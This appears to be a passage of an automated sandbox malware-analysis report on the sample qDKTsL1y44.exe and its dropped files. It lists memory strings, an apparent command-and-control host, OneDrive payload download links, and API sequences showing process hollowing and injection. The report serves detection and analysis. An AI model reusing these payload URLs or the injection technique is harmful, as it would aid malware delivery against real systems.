              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
              Source: veaiqniF.pif, 0000000A.00000002.1900086210.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://severdops.ddns.net:2024
              Source: qDKTsL1y44.exe, 00000000.00000002.1575958449.000000001BCCB000.00000004.00000020.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1484946816.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1483689151.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1677400225.000000007FA0F000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1634357707.00000000041D6000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000002.1747949897.0000000004146000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com0
              Source: Finqiaev.PIF, 00000009.00000003.1622819787.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://6vq0og.dm.files.1drv.com/
              Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.0000000000907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://6vq0og.dm.files.1drv.com/D
              Source: Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://6vq0og.dm.files.1drv.com/y4m3aPqlhZB_0wLdwaGCWc-RXOMCJxbKhzWOWoABTd5e_w-BiQM3UCqeieY-tLRf0ha
              Source: Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://6vq0og.dm.files.1drv.com/y4mM3rpwg7BF-uNJeP3DfPwGHRVNoN-DLFLu8jlzryO26WGzJKm854HPXCUj9LrimxR
              Source: Finqiaev.PIF, 00000009.00000002.1627524051.0000000000A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://6vq0og.dm.files.1drv.com/y4mn9WNtkP0NhvZjQvV5JNkK-eMlDWTl2-vx7V73JKE_frh33VNmO9up7keRF5WdLIe
              Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.0000000000907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://6vq0og.dm.files.1drv.com/y4mrGaL_KTVeS-FBZdHUZBFKFSCtn2zK-WNQQkQ3WaNPZIqxbjR5SIPEuqPBPlk17j5
              Source: Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://6vq0og.dm.files.1drv.com:443/y4m3aPqlhZB_0wLdwaGCWc-RXOMCJxbKhzWOWoABTd5e_w-BiQM3UCqeieY-tLR
              Source: Finqiaev.PIF, 00000009.00000003.1622819787.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1627524051.0000000000A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://6vq0og.dm.files.1drv.com:443/y4mn9WNtkP0NhvZjQvV5JNkK-eMlDWTl2-vx7V73JKE_frh33VNmO9up7keRF5W
              Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.0000000000907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://6vq0og.dm.files.1drv.com:443/y4mrGaL_KTVeS-FBZdHUZBFKFSCtn2zK-WNQQkQ3WaNPZIqxbjR5SIPEuqPBPlk
              Source: veaiqniF.pifString found in binary or memory: https://checkip.amazonaws.com/socket
              Source: veaiqniF.pif, 0000000C.00000002.1945846450.0000000000D90000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/countryresource
              Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000003.1622819787.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
              Source: Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/$Tu
              Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/)
              Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/Z
              Source: Finqiaev.PIF, 0000000B.00000003.1739950687.0000000000648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
              Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/;
              Source: Finqiaev.PIF, 0000000B.00000003.1739950687.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=22C765749E54F934%21123&authkey=
              Source: qDKTsL1y44.exe, 00000000.00000002.1503258792.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com:443/download?resid=22C765749E54F934%21123&authkey=
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49716 version: TLS 1.2
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_04204F7C GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,0_2_04204F7C
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0421F140 GetMessagePos,GetKeyboardState,0_2_0421F140
              Source: Yara matchFile source: Process Memory Space: qDKTsL1y44.exe PID: 7304, type: MEMORYSTR
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0423CA40 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,0_2_0423CA40
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0423B5FC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0423B5FC
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0423B684 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0423B684
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0423B768 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_0423B768
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041FFCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_041FFCD8
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041FFD38 LoadLibraryExA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtProtectVirtualMemory,GetCurrentProcess,NtWriteVirtualMemory,FreeLibrary,0_2_041FFD38
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_04207E4C CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_04207E4C
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041FFB80 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_041FFB80
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041FFB7E GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_041FFB7E
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 9_2_0419B768 NtOpenFile,NtReadFile,9_2_0419B768
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 9_2_0415FD38 LoadLibraryExA,NtWriteVirtualMemory,FreeLibrary,9_2_0415FD38
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 9_2_04167E4C GetMonitorInfoA,CreateProcessAsUserW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,GetMonitorInfoA,NtWriteVirtualMemory,NtWriteVirtualMemory,GetSystemMetrics,Wow64SetThreadContext,NtResumeThread,9_2_04167E4C
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 9_2_0415FB80 NtAllocateVirtualMemory,9_2_0415FB80
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_0410CA40 WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,11_2_0410CA40
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_0410B768 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,11_2_0410B768
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_040CFCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,11_2_040CFCD8
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_040CFD38 LoadLibraryExA,GetProcAddress,GetCurrentProcess,NtWriteVirtualMemory,FreeLibrary,11_2_040CFD38
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_040D7E4C GetMonitorInfoA,CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,GetMonitorInfoA,NtWriteVirtualMemory,NtWriteVirtualMemory,GetSystemMetrics,SetThreadContext,Wow64SetThreadContext,NtResumeThread,11_2_040D7E4C
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_040CFB80 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,11_2_040CFB80
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_0410B684 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,11_2_0410B684
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_04103114 NtdllDefWindowProc_A,11_2_04103114
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_040EF340 NtdllDefWindowProc_A,GetCapture,11_2_040EF340
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_040E3E00 GetSubMenu,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,11_2_040E3E00
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_041038CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,11_2_041038CC
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_04103990 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,11_2_04103990
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_040CFB7E GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,11_2_040CFB7E
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0423CA40 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,0_2_0423CA40
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeFile created: C:\Users\Public\Libraries\truesight.sysJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows Jump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0422C5080_2_0422C508
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_041E21600_2_041E2160
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0425A1DD0_2_0425A1DD
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_04258D180_2_04258D18
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0424EFBB0_2_0424EFBB
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0425AACF0_2_0425AACF
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0425906B0_2_0425906B
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_04213E000_2_04213E00
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_042559D60_2_042559D6
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: 0_2_0426BA280_2_0426BA28
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 9_2_0418C5089_2_0418C508
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 9_2_041421609_2_04142160
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 9_2_04173E009_2_04173E00
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_040FC50811_2_040FC508
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_040B216011_2_040B2160
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_040E3E0011_2_040E3E00
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: 11_2_040C586211_2_040C5862
              Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
              Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\netutils.dll C300A049564EEF6D8BAA136858F1F6F0779003BD1B566D95689883C6935E2BA6
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: String function: 040B6B54 appears 87 times
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: String function: 04144980 appears 77 times
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: String function: 04146B54 appears 86 times
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: String function: 040B4980 appears 77 times
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: String function: 04144B0C appears 363 times
              Source: C:\Users\Public\Libraries\Finqiaev.PIFCode function: String function: 040B4B0C appears 363 times
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: String function: 041E4B0C appears 426 times
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: String function: 041E4980 appears 78 times
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: String function: 041E4788 appears 83 times
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeCode function: String function: 041E6B54 appears 87 times
              Source: netutils.dll.0.drStatic PE information: Number of sections : 19 > 10
              Source: qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs qDKTsL1y44.exe
              Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs qDKTsL1y44.exe
              Source: qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs qDKTsL1y44.exe
              Source: qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs qDKTsL1y44.exe
              Source: qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs qDKTsL1y44.exe
              Source: qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs qDKTsL1y44.exe
              Source: qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs qDKTsL1y44.exe
              Source: qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs qDKTsL1y44.exe
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: url.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: archiveint.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\qDKTsL1y44.exeSection loaded: amsi.dllJump to behavior
